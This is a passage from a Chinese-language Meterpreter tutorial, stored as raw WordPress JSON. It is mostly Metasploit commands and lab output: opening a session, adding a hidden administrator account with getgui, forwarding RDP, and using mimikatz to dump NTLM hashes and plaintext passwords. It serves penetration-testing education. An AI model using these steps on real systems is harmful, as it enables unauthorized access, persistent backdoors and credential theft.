de\u63a5<\/p>\n\n\n\n<p>root@Kali:~# msfconsole<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;,<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;((__&#8212;,,,&#8212;__))<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(_)&nbsp;O&nbsp;O&nbsp;(_)_________<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;o_o&nbsp;&nbsp;&nbsp;&nbsp;M&nbsp;S&nbsp;F&nbsp;&nbsp;&nbsp;|<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_____&nbsp;&nbsp;|&nbsp;&nbsp;*<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|||&nbsp;&nbsp;&nbsp;WW|||<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|||&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|||<\/p>\n\n\n\n<p>Using&nbsp;notepad&nbsp;to&nbsp;track&nbsp;pentests?&nbsp;Have&nbsp;Metasploit&nbsp;Pro&nbsp;report&nbsp;on&nbsp;hosts,<\/p>\n\n\n\n<p>services,&nbsp;sessions&nbsp;and&nbsp;evidence&nbsp;&#8212;&nbsp;type&nbsp;&#8216;go_pro&#8217;&nbsp;to&nbsp;launch&nbsp;it&nbsp;now.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=[&nbsp;metasploit&nbsp;v4.8.1-2013120401&nbsp;[core:4.8&nbsp;api:1.0]<\/p>\n\n\n\n<p>+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;1239&nbsp;exploits&nbsp;&#8211;&nbsp;755&nbsp;auxiliary&nbsp;&#8211;&nbsp;207&nbsp;post<\/p>\n\n\n\n<p>+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;324&nbsp;payloads&nbsp;&#8211;&nbsp;31&nbsp;encoders&nbsp;&#8211;&nbsp;8&nbsp;nops<\/p>\n\n\n\n<p>msf&nbsp;&gt;&nbsp;use&nbsp; exploit\/multi\/handler<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;PAYLOAD&nbsp;windows\/meterpreter\/metsvc_bind_tcp<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;show&nbsp;options<\/p>\n\n\n\n<p>Module&nbsp;options&nbsp;(exploit\/multi\/handler):<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;Name&nbsp;&nbsp;Current&nbsp;Setting&nbsp;&nbsp;Required&nbsp;&nbsp;Description<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&#8212;&#8212;&#8212;&#8212;&#8212;&nbsp;&nbsp;&#8212;&#8212;&#8211;&nbsp;&nbsp;&#8212;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>Payload&nbsp;options&nbsp;(windows\/metsvc_bind_tcp):<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Current&nbsp;Setting&nbsp;&nbsp;Required&nbsp;&nbsp;Description<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;&#8212;&#8212;&#8212;&nbsp;&nbsp;&#8212;&#8212;&#8211;&nbsp;&nbsp;&#8212;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;EXITFUNC&nbsp;&nbsp;process&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exit&nbsp;technique:&nbsp;seh,&nbsp;thread,&nbsp;process,&nbsp;none<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;LPORT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4444&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;listen&nbsp;port<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;RHOST&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;target&nbsp;address<\/p>\n\n\n\n<p>Exploit&nbsp;target:<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;Id&nbsp;&nbsp;Name<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&#8212;&nbsp;&nbsp;&#8212;-<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;Wildcard&nbsp;Target<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;RHOST&nbsp;192.168.111.133<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;LPORT&nbsp;31337<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;exploit<\/p>\n\n\n\n<p>[*]&nbsp;Started&nbsp;bind&nbsp;handler<\/p>\n\n\n\n<p>[*]&nbsp;Starting&nbsp;the&nbsp;payload&nbsp;handler&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;opened&nbsp;(192.168.111.129:49313&nbsp;-&gt;&nbsp;192.168.111.133:31337)&nbsp;at2014-03-13&nbsp;23:12:54&nbsp;+0800<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e09:\u8fd9\u4e2a\u662f\u7c7b\u4f3c\u4e8e\u6dfb\u52a0\u8d26\u62373389\u8fdc\u7a0b\u8fde\u63a5<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;run&nbsp;getgui&nbsp;-u&nbsp;zero&nbsp;-p&nbsp;haizeiwang123_<\/p>\n\n\n\n<p>[*]&nbsp;Windows&nbsp;Remote&nbsp;Desktop&nbsp;Configuration&nbsp;Meterpreter&nbsp;Script&nbsp;by&nbsp;Darkoperator<\/p>\n\n\n\n<p>[*]&nbsp;Carlos&nbsp;Perez&nbsp;carlos_perez@darkoperator.com<\/p>\n\n\n\n<p>[*]&nbsp;Setting&nbsp;user&nbsp;account&nbsp;for&nbsp;logon<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adding&nbsp;User:&nbsp;zero&nbsp;with&nbsp;Password:&nbsp;haizeiwang123_<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Hiding&nbsp;user&nbsp;from&nbsp;Windows&nbsp;Login&nbsp;screen<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adding&nbsp;User:&nbsp;zero&nbsp;to&nbsp;local&nbsp;group&nbsp;&#8216;Remote Desktop Users&#8217;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adding&nbsp;User:&nbsp;zero&nbsp;to&nbsp;local&nbsp;group&nbsp;&#8216;Administrators&#8217;<\/p>\n\n\n\n<p>[*]&nbsp;You&nbsp;can&nbsp;now&nbsp;login&nbsp;with&nbsp;the&nbsp;created&nbsp;user<\/p>\n\n\n\n<p>[*]&nbsp;For&nbsp;cleanup&nbsp;use&nbsp;command:&nbsp;run&nbsp;multi_console_command&nbsp;-rc&nbsp;\/root\/.msf4\/logs\/scripts\/getgui\/clean_up__20140314.4134.rc<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<\/p>\n\n\n\n<p>(5).\u7aef\u53e3\u8f6c\u53d1<br>\u4e3b\u673a\u5904\u4e8e\u5185\u7f51\u4e5f\u662f\u6bd4\u8f83\u5e38\u89c1\u7684,metasploit\u81ea\u5e26\u4e86\u4e00\u4e2a\u7aef\u53e3\u8f6c\u53d1\u5de5\u5177<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;portfwd&nbsp;-h<\/p>\n\n\n\n<p>Usage:&nbsp;portfwd&nbsp;[-h]&nbsp;[add&nbsp;|&nbsp;delete&nbsp;|&nbsp;list&nbsp;|&nbsp;flush]&nbsp;[args]<\/p>\n\n\n\n<p>OPTIONS:<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-L&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;local&nbsp;host&nbsp;to&nbsp;listen&nbsp;on&nbsp;(optional).<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Help&nbsp;banner.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-l&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;local&nbsp;port&nbsp;to&nbsp;listen&nbsp;on.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;remote&nbsp;port&nbsp;to&nbsp;connect&nbsp;to.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-r&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;remote&nbsp;host&nbsp;to&nbsp;connect&nbsp;to.<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;portfwd&nbsp;add&nbsp;-L&nbsp;1234&nbsp;-p&nbsp;3389&nbsp;-r&nbsp;192.168.111.133<\/p>\n\n\n\n<p>[-]&nbsp;You&nbsp;must&nbsp;supply&nbsp;a&nbsp;local&nbsp;port,&nbsp;remote&nbsp;host,&nbsp;and&nbsp;remote&nbsp;port.<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;portfwd&nbsp;add&nbsp;-l&nbsp;1234&nbsp;-p&nbsp;3389&nbsp;-r&nbsp;192.168.111.133<\/p>\n\n\n\n<p>[*]&nbsp;Local&nbsp;TCP&nbsp;relay&nbsp;created:&nbsp;0.0.0.0:1234&nbsp;&lt;-&gt;&nbsp;192.168.111.133:3389<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8fd0\u884c<\/p>\n\n\n\n<p>rdesktop&nbsp;-u&nbsp;zero&nbsp;-p&nbsp;haizeiwang123_&nbsp;127.0.0.1:1234<\/p>\n\n\n\n<p>(6).\u83b7\u53d6\u5bc6\u7801<br>\u6cd5\u56fd\u795e\u5668mimikatz\u53ef\u4ee5\u76f4\u63a5\u83b7\u5f97\u64cd\u4f5c\u7cfb\u7edf\u7684\u660e\u6587\u5bc6\u7801,meterpreter\u6dfb\u52a0\u4e86\u8fd9\u4e2a\u6a21\u5757<br>\u9996\u5148\u52a0\u8f7dmimikatz\u6a21\u5757<br>\u7531\u4e8e\u6211\u7684Windows 2008\u662f64\u4f4d\u7684\uff0c\u6240\u4ee5\u5148\u8981\u8f6c\u79fb\u523064\u4f4d\u8fdb\u7a0b<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;ps<\/p>\n\n\n\n<p>&#8230;&#8230;<\/p>\n\n\n\n<p>2000&nbsp;&nbsp;472&nbsp;&nbsp;&nbsp;dllhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32dllhost.exe<\/p>\n\n\n\n<p>2264&nbsp;&nbsp;1832&nbsp;&nbsp;explorer.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEzero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:Windowsexplorer.exe<\/p>\n\n\n\n<p>2292&nbsp;&nbsp;2264&nbsp;&nbsp;vmtoolsd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEzero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:Program&nbsp;FilesVMwareVMware&nbsp;Toolsvmtoolsd.exe<\/p>\n\n\n\n<p>2520&nbsp;&nbsp;372&nbsp;&nbsp;&nbsp;FfBoPtYGlNj.exe&nbsp;&nbsp;&nbsp;&nbsp;x86&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe<\/p>\n\n\n\n<p>2780&nbsp;&nbsp;2256&nbsp;&nbsp;winlogon.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32winlogon.exe<\/p>\n\n\n\n<p>3028&nbsp;&nbsp;880&nbsp;&nbsp;&nbsp;dwm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEzero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32dwm.exe<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;migrate&nbsp;2780<\/p>\n\n\n\n<p>[*]&nbsp;Removing&nbsp;existing&nbsp;TCP&nbsp;relays&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Successfully&nbsp;stopped&nbsp;TCP&nbsp;relay&nbsp;on&nbsp;0.0.0.0:1234<\/p>\n\n\n\n<p>[*]&nbsp;1&nbsp;TCP&nbsp;relay(s)&nbsp;removed.<\/p>\n\n\n\n<p>[*]&nbsp;Migrating&nbsp;from&nbsp;1428&nbsp;to&nbsp;2264&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Migration&nbsp;completed&nbsp;successfully.<\/p>\n\n\n\n<p>[*]&nbsp;Recreating&nbsp;TCP&nbsp;relay(s)&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Local&nbsp;TCP&nbsp;relay&nbsp;recreated:&nbsp;0.0.0.0:1234&nbsp;&lt;-&gt;&nbsp;192.168.111.133:3389<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;load&nbsp;mimikatz<\/p>\n\n\n\n<p>Loading&nbsp;extension&nbsp;mimikatz&#8230;success.<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<\/p>\n\n\n\n<p>\u83b7\u53d6\u5bc6\u7801\u54c8\u5e0c:<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;msv<\/p>\n\n\n\n<p>[+]&nbsp;Running&nbsp;as&nbsp;SYSTEM<\/p>\n\n\n\n<p>[*]&nbsp;Retrieving&nbsp;msv&nbsp;credentials<\/p>\n\n\n\n<p>msv&nbsp;credentials<\/p>\n\n\n\n<p>===============<\/p>\n\n\n\n<p>AuthID&nbsp;&nbsp;&nbsp;&nbsp;Package&nbsp;&nbsp;&nbsp;&nbsp;Domain&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password<\/p>\n\n\n\n<p>&#8212;&#8212;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>0;339062&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;Administrator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lm{&nbsp;179b3f1af1324ade301c14040883a0d8&nbsp;},&nbsp;ntlm{&nbsp;358c0a328bdf6b42185ca0a1773fb0be&nbsp;}<\/p>\n\n\n\n<p>0;593431&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;zero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lm{&nbsp;bc61a4bbe791e26298911297f380ff1b&nbsp;},&nbsp;ntlm{&nbsp;880be0798a0d1caebdf913bfcc28e1ad&nbsp;}<\/p>\n\n\n\n<p>0;593459&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;zero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lm{&nbsp;bc61a4bbe791e26298911297f380ff1b&nbsp;},&nbsp;ntlm{&nbsp;880be0798a0d1caebdf913bfcc28e1ad&nbsp;}<\/p>\n\n\n\n<p>0;995&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;NT&nbsp;AUTHORITY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IUSR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;n.s.&nbsp;(Credentials&nbsp;KO)<\/p>\n\n\n\n<p>0;996&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;WORKGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE$&nbsp;&nbsp;n.s.&nbsp;(Credentials&nbsp;KO)<\/p>\n\n\n\n<p>0;997&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;NT&nbsp;AUTHORITY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;n.s.&nbsp;(Credentials&nbsp;KO)<\/p>\n\n\n\n<p>0;47971&nbsp;&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;n.s.&nbsp;(Credentials&nbsp;KO)<\/p>\n\n\n\n<p>0;999&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WORKGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE$&nbsp;&nbsp;n.s.&nbsp;(Credentials&nbsp;KO)<\/p>\n\n\n\n<p>\u83b7\u53d6\u660e\u6587\u5bc6\u7801<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;kerberos<\/p>\n\n\n\n<p>[+]&nbsp;Running&nbsp;as&nbsp;SYSTEM<\/p>\n\n\n\n<p>[*]&nbsp;Retrieving&nbsp;kerberos&nbsp;credentials<\/p>\n\n\n\n<p>kerberos&nbsp;credentials<\/p>\n\n\n\n<p>====================<\/p>\n\n\n\n<p>AuthID&nbsp;&nbsp;&nbsp;&nbsp;Package&nbsp;&nbsp;&nbsp;&nbsp;Domain&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password<\/p>\n\n\n\n<p>&#8212;&#8212;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>0;999&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WORKGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE$<\/p>\n\n\n\n<p>0;996&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;WORKGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE$<\/p>\n\n\n\n<p>0;47971&nbsp;&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>0;997&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;NT&nbsp;AUTHORITY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>0;995&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Negotiate&nbsp;&nbsp;NT&nbsp;AUTHORITY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IUSR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>0;339062&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;Administrator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ceshimima123_<\/p>\n\n\n\n<p>0;593459&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;zero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;haizeiwang123_<\/p>\n\n\n\n<p>0;593431&nbsp;&nbsp;NTLM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCE&nbsp;&nbsp;zero&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;haizeiwang123_<\/p>\n","protected":false},"excerpt":{"rendered":"<p>0x01\u521d\u8bc6Meterpreter 1.1.\u4ec0\u4e48\u662f<\/p>\n<p><a href=\"https:\/\/sportai.asia\/index.php\/2022\/06\/12\/meterpreter%e5%91%bd%e4%bb%a4%e8%af%a6%e8%a7%a3\/\" class=\"more-link\">Read More<span class=\"screen-reader-text\"><a href=\"https:\/\/www.cnblogs.com\/backlion\/p\/9484949.html\">Meterpreter\u547d\u4ee4\u8be6\u89e3<\/a><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[41],"tags":[],"class_list":["post-305","post","type-post","status-publish","format-standard","hentry","category-41"],"_links":{"self":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/comments?post=305"}],"version-history":[{"count":1,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305\/revisions"}],"predecessor-version":[{"id":306,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305\/revisions\/306"}],"wp:attachment":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/media?parent=305"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/categories?post=305"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/tags?post=305"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}